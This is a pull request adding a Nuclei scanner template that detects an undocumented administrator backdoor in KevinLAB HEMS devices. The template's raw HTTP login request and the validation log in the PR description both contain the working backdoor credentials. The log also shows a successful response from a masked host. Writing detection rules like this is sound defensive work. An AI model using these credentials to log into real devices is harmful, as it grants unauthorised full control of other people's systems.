### PR TITLE
Create kevinlab-hems-backdoor.yaml

### DIFF
--- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -6,7 +6,7 @@ info:
   severity: critical
   description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
   reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
-  tags: kevinlab
+  tags: kevinlab,default-login,backdoor
 
 requests:
   - raw:

--- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -13,24 +13,24 @@ requests:
       - |
         POST /dashboard/proc.php?type=login HTTP/1.1
         Host: {{Hostname}}
-        Accept: application/json, text/javascript, */*; q=0.01
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         Accept-Encoding: gzip, deflate
-        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
         Connection: close
 
         userid=kevinlab&userpass=kevin003
 
     matchers-condition: and
-    req-condition: true
     matchers:
-      - type: dsl
-        dsl:
-          - "!contains(body_1, 'alert')"
-          - "contains(body_1, 'meta http-equiv')"
-        condition: and
 
       - type: status
         status:
           - 200
+
+      - type: word
+        words:
+          - '<meta http-equiv="refresh" content="0; url=/"></meta>'
+
+      - type: word
+        words:
+          - '<script> alert'
+        negative: true

--- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -34,3 +34,8 @@ requests:
         words:
           - '<script> alert'
         negative: true
+
+      - type: word
+        words:
+          - 'PHPSESSID'
+        part: header

--- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml
+++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml
@@ -1,0 +1,36 @@
+id: kevinlab-hems-backdoor
+
+info:
+  name: KevinLAB HEMS Undocumented Backdoor Account
+  author: gy741
+  severity: critical
+  description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
+  tags: kevinlab
+
+requests:
+  - raw:
+      - |
+        POST /dashboard/proc.php?type=login HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+        userid=kevinlab&userpass=kevin003
+
+    matchers-condition: and
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "!contains(body_1, 'alert')"
+          - "contains(body_1, 'meta http-equiv')"
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information
Hello,

Added kevinlab-hems-backdoor.yaml detection rules.

I took your advice from the Discord and made a new rule.

```
The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely.
```

Thanks.



- References: https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/other/kevinlab-bems-backdoor.yaml

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```
OST /dashboard/proc.php?type=login HTTP/1.1
Host: xxx.xxxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Length: 33
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userid=kevinlab&userpass=kevin003
[INF] [kevinlab-hems-backdoor] Dumped HTTP response for http://xxx.xxxx.xxx.xxx/dashboard/proc.php?type=login

HTTP/1.1 200 OK
Connection: close
Content-Length: 75
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 26 Jul 2021 17:49:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.6 (CentOS)
Set-Cookie: PHPSESSID=mgdtn8hqafucm33i2avn8dajs0; expires=Tue, 27-Jul-2021 17:49:13 GMT; path=/

<meta charset="UTF-8"><meta http-equiv="refresh" content="0; url=/"></meta>
[2021-07-27 02:49:13] [kevinlab-hems-backdoor] [http] [critical] http://xxx.xxxx.xxx.xxx/dashboard/proc.php?type=login
```